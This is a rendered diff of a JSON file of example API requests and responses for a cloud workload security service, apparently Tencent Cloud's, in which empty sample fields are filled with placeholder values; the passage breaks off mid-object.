"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteRiskDnsEvent\n<公共请求参数>\n\n{}",
|
462
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteRiskDnsEvent\n<公共请求参数>\n\n{\n \"Ids\": [\n 1002\n ]\n}",
|
477
463
|
"output": "{\n \"Response\": {\n \"RequestId\": \"130e109f-a922-4d16-827d-b17a366125a2\"\n }\n}",
|
478
464
|
"title": "删除恶意请求事件"
|
479
465
|
}
|
@@ -529,7 +515,7 @@
|
|
529
515
|
"DeleteWebHookRule": [
|
530
516
|
{
|
531
517
|
"document": "删除企微机器人规则",
|
532
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteWebHookRule\n<公共请求参数>\n\n{\n \"Ids\": [\n
|
518
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteWebHookRule\n<公共请求参数>\n\n{\n \"Ids\": [\n 10001\n ]\n}",
|
533
519
|
"output": "{\n \"Response\": {\n \"RequestId\": \"747c393e-f771-47ca-af0a-cc36b88f107a\"\n }\n}",
|
534
520
|
"title": "删除企微机器人规则"
|
535
521
|
}
|
@@ -569,8 +555,8 @@
|
|
569
555
|
"DescribeAgentInstallCommand": [
|
570
556
|
{
|
571
557
|
"document": "",
|
572
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAgentInstallCommand\n<公共请求参数>\n\n{\n \"ExpireDate\": \"2020-09-22\",\n \"RegionCode\": \"
|
573
|
-
"output": "{\n \"Response\": {\n \"WindowsCommand\": \"
|
558
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAgentInstallCommand\n<公共请求参数>\n\n{\n \"ExpireDate\": \"2020-09-22\",\n \"RegionCode\": \"gz\",\n \"VpcId\": \"vpc-12345\",\n \"IsCloud\": true,\n \"NetType\": \"public\",\n \"TagIds\": [\n 1\n ]\n}",
|
559
|
+
"output": "{\n \"Response\": {\n \"WindowsCommand\": \"ydeyes.exe\",\n \"LinuxCommand\": \"ydeyes.exe\",\n \"ARMCommand\": \"ydeyes.exe\",\n \"WindowsDownloadUrl\": \"ydeyes.exe\",\n \"RequestId\": \"1234-1234-1234\",\n \"WindowsStepOne\": \"ydeyes.exe\",\n \"WindowsStepTwo\": \"ydeyes.exe\"\n }\n}",
|
574
560
|
"title": "DescribeAgentInstallCommand"
|
575
561
|
}
|
576
562
|
],
|
@@ -594,7 +580,7 @@
|
|
594
580
|
{
|
595
581
|
"document": "获取时间范围内所有告警vid",
|
596
582
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAlarmVertexId\n<公共请求参数>\n\n{\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"StartTime\": 0,\n \"EndTime\": 0\n}",
|
597
|
-
"output": "{\n \"Response\": {\n \"AlarmVertexIds\": [\n \"23eeeb4347bdd26bfc6b7ee9a3b755dd\"\n ],\n \"RequestId\": \"
|
583
|
+
"output": "{\n \"Response\": {\n \"AlarmVertexIds\": [\n \"23eeeb4347bdd26bfc6b7ee9a3b755dd\"\n ],\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
598
584
|
"title": "示例"
|
599
585
|
}
|
600
586
|
],
|
@@ -610,7 +596,7 @@
|
|
610
596
|
{
|
611
597
|
"document": "",
|
612
598
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetAppList\n<公共请求参数>\n\n{}",
|
613
|
-
"output": "{\n \"Response\": {\n \"Apps\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Type\": 1,\n \"BinPath\": \"/root\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProcessCount\": 1,\n \"Desc\": \"
|
599
|
+
"output": "{\n \"Response\": {\n \"Apps\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Type\": 1,\n \"BinPath\": \"/root\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProcessCount\": 1,\n \"Desc\": \"idesc\",\n \"Version\": \"0.1.1\",\n \"ConfigPath\": \"/root\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
614
600
|
"title": "查询应用列表"
|
615
601
|
}
|
616
602
|
],
|
@@ -618,7 +604,7 @@
|
|
618
604
|
{
|
619
605
|
"document": "",
|
620
606
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetAppProcessList\n<公共请求参数>\n\n{\n \"Name\": \"ssh\",\n \"Offset\": 1,\n \"Limit\": 1,\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n}",
|
621
|
-
"output": "{\n \"Response\": {\n \"Process\": [\n {\n \"Status\": \"S\",\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"User\": \"
|
607
|
+
"output": "{\n \"Response\": {\n \"Process\": [\n {\n \"Status\": \"S\",\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"User\": \"root\",\n \"StartTime\": \"2024-10-11 12:23:34\",\n \"Path\": \"/root\"\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
622
608
|
"title": "获取软件关联进程列表"
|
623
609
|
}
|
624
610
|
],
|
@@ -626,15 +612,15 @@
|
|
626
612
|
{
|
627
613
|
"document": "",
|
628
614
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetCoreModuleInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Id\": \"1024\"\n}",
|
629
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\",\n \"Module\": {\n \"Processes\": \"sshd\",\n \"Name\": \"test-name\",\n \"Modules\": \"ssh\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"Version\": \"0.1.1\",\n \"Params\": [\n {\n \"Data\": \"\",\n \"Name\": \"test-name\"\n }\n ],\n \"Path\": \"/root\",\n \"Desc\": \"\",\n \"Size\": 1\n }\n }\n}",
|
615
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\",\n \"Module\": {\n \"Processes\": \"sshd\",\n \"Name\": \"test-name\",\n \"Modules\": \"ssh\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"Version\": \"0.1.1\",\n \"Params\": [\n {\n \"Data\": \"idata\",\n \"Name\": \"test-name\"\n }\n ],\n \"Path\": \"/root\",\n \"Desc\": \"idesc\",\n \"Size\": 1\n }\n }\n}",
|
630
616
|
"title": "获取内核模块详情"
|
631
617
|
}
|
632
618
|
],
|
633
619
|
"DescribeAssetCoreModuleList": [
|
634
620
|
{
|
635
621
|
"document": "",
|
636
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetCoreModuleList\n<公共请求参数>\n\n{\n \"Uuid\": \"65ce6db8-a914-4349-a8b9-d756236686d2\",\n \"Order\": \"asc\",\n \"Limit\": 1,\n \"Quuid\": \"65ce6db8-a914-4349-a8b9-d756236686d2\",\n \"
|
637
|
-
"output": "{\n \"Response\": {\n \"Modules\": [\n {\n \"Name\": \"test-name\",\n \"Desc\": \"
|
622
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetCoreModuleList\n<公共请求参数>\n\n{\n \"Uuid\": \"65ce6db8-a914-4349-a8b9-d756236686d2\",\n \"Order\": \"asc\",\n \"Limit\": 1,\n \"Quuid\": \"65ce6db8-a914-4349-a8b9-d756236686d2\",\n \"Offset\": 1,\n \"By\": \"Size\"\n}",
|
623
|
+
"output": "{\n \"Response\": {\n \"Modules\": [\n {\n \"Name\": \"test-name\",\n \"Desc\": \"idesc\",\n \"Path\": \"/root\",\n \"Version\": \"0.1.1\",\n \"MachineIp\": \"1.1.1.1\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Size\": 1,\n \"ProcessCount\": 1,\n \"ModuleCount\": 1,\n \"Id\": \"1024\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-id\",\n \"InstanceID\": \"ins-id\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
638
624
|
"title": "查询资产管理内核模块列表"
|
639
625
|
}
|
640
626
|
],
|
@@ -650,7 +636,7 @@
|
|
650
636
|
{
|
651
637
|
"document": "",
|
652
638
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetDatabaseInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Id\": \"1024\"\n}",
|
653
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\",\n \"Database\": {\n \"OsInfo\": \"CentOs Bit64\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"MachineWanIp\": \"
|
639
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\",\n \"Database\": {\n \"OsInfo\": \"CentOs Bit64\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Proto\": \"tcp\",\n \"ErrorLogPath\": \"/root\",\n \"Ip\": \"10.0.0.11\",\n \"Permission\": \"root\",\n \"LogPath\": \"/root\",\n \"DataPath\": \"/root\",\n \"Param\": \"--config\",\n \"ConfigPath\": \"/root\",\n \"BinPath\": \"/root\",\n \"Version\": \"0.1.1\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"PlugInPath\": \"/root\",\n \"Name\": \"test-name\",\n \"Port\": \"22\",\n \"MachineIp\": \"10.0.0.11\",\n \"User\": \"root\"\n }\n }\n}",
|
654
640
|
"title": "获取资产管理数据库详情"
|
655
641
|
}
|
656
642
|
],
|
@@ -658,7 +644,7 @@
|
|
658
644
|
{
|
659
645
|
"document": "查询资产管理数据库列表",
|
660
646
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetDatabaseList\n<公共请求参数>\n\n{}",
|
661
|
-
"output": "{\n \"Response\": {\n \"Databases\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"
|
647
|
+
"output": "{\n \"Response\": {\n \"Databases\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"Port\": \"22\",\n \"Proto\": \"tcp\",\n \"User\": \"root\",\n \"Ip\": \"10.0.0.11\",\n \"ConfigPath\": \"/root\",\n \"LogPath\": \"/root\",\n \"DataPath\": \"/root\",\n \"Permission\": \"root\",\n \"ErrorLogPath\": \"/root\",\n \"PlugInPath\": \"/root\",\n \"BinPath\": \"/root\",\n \"Param\": \"iparam\",\n \"Id\": \"10001\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineName\": \"test-name\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-id\",\n \"InstanceID\": \"ins-id\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
662
648
|
"title": "查询资产管理数据库列表"
|
663
649
|
}
|
664
650
|
],
|
@@ -674,7 +660,7 @@
|
|
674
660
|
{
|
675
661
|
"document": "",
|
676
662
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetEnvList\n<公共请求参数>\n\n{\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Limit\": 1,\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Offset\": 1,\n \"Type\": 1\n}",
|
677
|
-
"output": "{\n \"Response\": {\n \"Envs\": [\n {\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Name\": \"ID\",\n \"Type\": 0,\n \"User\": \"root\",\n \"Value\": \"/run/user/0\",\n \"MachineIp\": \"
|
663
|
+
"output": "{\n \"Response\": {\n \"Envs\": [\n {\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Name\": \"ID\",\n \"Type\": 0,\n \"User\": \"root\",\n \"Value\": \"/run/user/0\",\n \"MachineIp\": \"1.1.1.1\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineName\": \"销售许可测试机器\",\n \"OsInfo\": \"CentOS 7.9 64位\",\n \"UpdateTime\": \"2024-10-21 23:53:11\",\n \"FirstTime\": \"2024-10-18 14:27:56\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-id\",\n \"InstanceID\": \"ins-id\",\n \"HostName\": \"hname\"\n }\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"1703764f-b3ea-4d7f-99cb-cc3a6a62e2ec\"\n }\n}",
|
678
664
|
"title": "查询资产管理环境变量列表"
|
679
665
|
}
|
680
666
|
],
|
@@ -690,7 +676,7 @@
|
|
690
676
|
{
|
691
677
|
"document": "",
|
692
678
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetInfo\n<公共请求参数>\n\n{}",
|
693
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
679
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"MachineCount\": 100,\n \"AccountCount\": 100,\n \"PortCount\": 100,\n \"ProcessCount\": 100,\n \"SoftwareCount\": 100,\n \"DatabaseCount\": 100,\n \"WebAppCount\": 100,\n \"WebFrameCount\": 100,\n \"WebServiceCount\": 100,\n \"WebLocationCount\": 100,\n \"AccountNewCount\": 100,\n \"PortNewCount\": 100,\n \"ProcessNewCount\": 100,\n \"SoftwareNewCount\": 100,\n \"DatabaseNewCount\": 100,\n \"WebAppNewCount\": 100,\n \"WebFrameNewCount\": 100,\n \"WebServiceNewCount\": 100,\n \"WebLocationNewCount\": 100,\n \"MachineNewCount\": 100\n }\n}",
|
694
680
|
"title": "获取资产数量概况"
|
695
681
|
}
|
696
682
|
],
|
@@ -698,15 +684,15 @@
|
|
698
684
|
{
|
699
685
|
"document": "查询资产管理启动服务列表",
|
700
686
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetInitServiceList\n<公共请求参数>\n\n{\n \"Uuid\": \"01fa34d3-db26-48ab-9f14-e8d3a48be951\",\n \"Limit\": 1,\n \"Quuid\": \"01fa34d3-db26-48ab-9f14-e8d3a48be951\",\n \"Filters\": [\n {\n \"Values\": [\n \"1\"\n ],\n \"Name\": \"IsAutoRun\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
|
701
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"b7b8a9cd-2470-4ea2-87fb-dd6fea05c32a\",\n \"Services\": [\n {\n \"Quuid\": \"01fa34d3-db26-48ab-9f14-e8d3a48be95e\",\n \"Uuid\": \"01fa34d3-db26-48ab-9f14-e8d3a48be95e\",\n \"Name\": \"efslsaext.dll\",\n \"Type\": 7,\n \"Status\": 1,\n \"User\": \"\",\n \"Path\": \"C:\\\\Windows\\\\System32\\\\efslsaext.dll\",\n \"MachineIp\": \"172.16.0.1\",\n \"MachineWanIp\": \"43.138.242.17\",\n \"MachineName\": \"win-test\",\n \"OsInfo\": \"Windows Server 2016 数据中心版 64位中文版\",\n \"UpdateTime\": \"2023-09-20 10:40:21\",\n \"FirstTime\": \"2023-09-20 10:40:29\",\n \"IsAutoRun\": 1,\n \"IsNew\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"43.138.242.17\",\n \"PrivateIP\": \"172.16.0.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"
|
687
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"b7b8a9cd-2470-4ea2-87fb-dd6fea05c32a\",\n \"Services\": [\n {\n \"Quuid\": \"01fa34d3-db26-48ab-9f14-e8d3a48be95e\",\n \"Uuid\": \"01fa34d3-db26-48ab-9f14-e8d3a48be95e\",\n \"Name\": \"efslsaext.dll\",\n \"Type\": 7,\n \"Status\": 1,\n \"User\": \"root\",\n \"Path\": \"C:\\\\Windows\\\\System32\\\\efslsaext.dll\",\n \"MachineIp\": \"172.16.0.1\",\n \"MachineWanIp\": \"43.138.242.17\",\n \"MachineName\": \"win-test\",\n \"OsInfo\": \"Windows Server 2016 数据中心版 64位中文版\",\n \"UpdateTime\": \"2023-09-20 10:40:21\",\n \"FirstTime\": \"2023-09-20 10:40:29\",\n \"IsAutoRun\": 1,\n \"IsNew\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"43.138.242.17\",\n \"PrivateIP\": \"172.16.0.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-d7f***\",\n \"InstanceID\": \"ins-4b90g85x\",\n \"HostName\": \"hn***\"\n }\n }\n ],\n \"Total\": 1\n }\n}",
|
702
688
|
"title": "查询资产管理启动服务列表"
|
703
689
|
}
|
704
690
|
],
|
705
691
|
"DescribeAssetJarInfo": [
|
706
692
|
{
|
707
693
|
"document": "",
|
708
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetJarInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"
|
709
|
-
"output": "{\n \"Response\": {\n \"Jar\": {\n \"Status\": 1,\n \"OsInfo\": \"CentOs Bit64\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"Name\": \"test-name\",\n \"Process\": [\n {\n \"Status\": \"S\",\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"User\": \"root\",\n \"StartTime\": \"2024-10-11 12:23:34\",\n \"Path\": \"/root\"\n }\n ],\n \"MachineName\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"Path\": \"/root\",\n \"Type\": 1,\n \"MachineIp\": \"10.0.0.11\",\n \"Md5\": \"
|
694
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetJarInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Uuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Id\": \"1024\"\n}",
|
695
|
+
"output": "{\n \"Response\": {\n \"Jar\": {\n \"Status\": 1,\n \"OsInfo\": \"CentOs Bit64\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"Name\": \"test-name\",\n \"Process\": [\n {\n \"Status\": \"S\",\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"User\": \"root\",\n \"StartTime\": \"2024-10-11 12:23:34\",\n \"Path\": \"/root\"\n }\n ],\n \"MachineName\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"Path\": \"/root\",\n \"Type\": 1,\n \"MachineIp\": \"10.0.0.11\",\n \"Md5\": \"708cae4cf814c3deda4208da228fad4e\"\n },\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
710
696
|
"title": "获取Jar包详情"
|
711
697
|
}
|
712
698
|
],
|
@@ -714,7 +700,7 @@
|
|
714
700
|
{
|
715
701
|
"document": "",
|
716
702
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetJarList\n<公共请求参数>\n\n{\n \"Uuid\": \"65ce6db8-a914-4349-a8b9-d756236686d2\",\n \"Limit\": 1,\n \"Quuid\": \"65ce6db8-a914-4349-a8b9-d756236686d2\",\n \"Filters\": [\n {\n \"Values\": [\n \"10.0.0.1\"\n ],\n \"Name\": \"IP\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
|
717
|
-
"output": "{\n \"Response\": {\n \"Jars\": [\n {\n \"Name\": \"test-name\",\n \"Type\": 0,\n \"Status\": 1,\n \"Version\": \"0.1.1\",\n \"Path\": \"/root\",\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Id\": \"1024\",\n \"Md5\": \"
|
703
|
+
"output": "{\n \"Response\": {\n \"Jars\": [\n {\n \"Name\": \"test-name\",\n \"Type\": 0,\n \"Status\": 1,\n \"Version\": \"0.1.1\",\n \"Path\": \"/root\",\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Id\": \"1024\",\n \"Md5\": \"fc702c8398071ea3697d449c2b894dae\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineWanIp\": \"110.84.0.11\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
718
704
|
"title": "查询Jar包列表"
|
719
705
|
}
|
720
706
|
],
|
@@ -722,7 +708,7 @@
|
|
722
708
|
{
|
723
709
|
"document": "",
|
724
710
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetLoadInfo\n<公共请求参数>\n\n{}",
|
725
|
-
"output": "{\n \"Response\": {\n \"CpuLoad\": {\n \"Counts\": [\n 1\n ],\n \"Top5\": [\n {\n \"MachineName\": \"instance-1\",\n \"Desc\": \"
|
711
|
+
"output": "{\n \"Response\": {\n \"CpuLoad\": {\n \"Counts\": [\n 1\n ],\n \"Top5\": [\n {\n \"MachineName\": \"instance-1\",\n \"Desc\": \"idesc\",\n \"Value\": 0,\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n ]\n },\n \"MemLoad\": {\n \"Counts\": [\n 1\n ],\n \"Top5\": [\n {\n \"MachineName\": \"instance-12\",\n \"Desc\": \"idesc\",\n \"Value\": 0,\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n ]\n },\n \"DiskLoad\": {\n \"Counts\": [\n 1\n ],\n \"Top5\": [\n {\n \"MachineName\": \"instance-13\",\n \"Desc\": \"idesc\",\n \"Value\": 0,\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n ]\n },\n \"RequestId\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n}",
|
726
712
|
"title": "获取资源负载概览"
|
727
713
|
}
|
728
714
|
],
|
@@ -730,7 +716,7 @@
|
|
730
716
|
{
|
731
717
|
"document": "",
|
732
718
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetMachineDetail\n<公共请求参数>\n\n{\n \"Quuid\": \"7dc822ab-1eaa-d469-67e2-0eed63e8be9c\",\n \"Uuid\": \"7dc822ab-1eaa-d469-67e2-0eed63e8be9c\"\n}",
|
733
|
-
"output": "{\n \"Response\": {\n \"MachineDetail\": {\n \"Quuid\": \"
|
719
|
+
"output": "{\n \"Response\": {\n \"MachineDetail\": {\n \"Quuid\": \"24ab84ea-99d9-4ec0-b8fc-f68553191066\",\n \"Uuid\": \"24ab84ea-99d9-4ec0-b8fc-f68553191066\",\n \"MachineIp\": \"172.16.0.13\",\n \"MachineName\": \"activity-cvm-2023-10-08\",\n \"ProjectId\": 0,\n \"OsInfo\": \"CentOS 7.9 64位\",\n \"Cpu\": \"Intel(R) Xeon(R) Platinum 8361HC CPU @ 2.60GHz\",\n \"MemSize\": 8,\n \"MemLoad\": \"23.87\",\n \"DiskSize\": 148,\n \"DiskLoad\": \"38.67\",\n \"PartitionCount\": 1,\n \"MachineWanIp\": \"139.199.156.164\",\n \"CpuSize\": 4,\n \"CpuLoad\": \"低\",\n \"CpuLoadVul\": \"低\",\n \"ProtectLevel\": 2,\n \"RiskStatus\": \"未知\",\n \"ProtectDays\": 393,\n \"BuyTime\": \"2024-01-23 22:29:15\",\n \"EndTime\": \"2025-02-23 22:27:32\",\n \"CoreVersion\": \"3.10.0-1160.99.1.el7.x86_64\",\n \"OsType\": \"linux\",\n \"AgentVersion\": \"5.2.1.72\",\n \"InstallTime\": \"2023-10-08 11:25:11\",\n \"BootTime\": \"2024-01-23 09:23:04\",\n \"LastLiveTime\": \"2024-09-19 21:23:13\",\n \"Producer\": \"Tencent Cloud\",\n \"SerialNumber\": \"24ab84ea-99d9-4ec0-b8fc-f68553191066\",\n \"DeviceVersion\": \"CVM\",\n \"Status\": 0,\n \"NetCards\": [\n {\n \"Name\": \"eth0\",\n \"Mac\": \"52:54:00:b2:54:c0\",\n \"Ip\": \"172.16.0.13\",\n \"Ipv6\": \"2001:db8:85a3::8a2e:370:**\",\n \"GateWay\": \"172.16.0.1\",\n \"DnsServer\": \"183.60.82.98,183.60.83.19\"\n }\n ],\n \"Disks\": [\n {\n \"Name\": \"/dev/vda1\",\n \"Size\": 100,\n \"Percent\": 60,\n \"Type\": \"ext4\",\n \"Path\": \"/data\",\n \"Used\": 19\n }\n ],\n \"OfflineTime\": \"2020-10-01 00:00:00\",\n 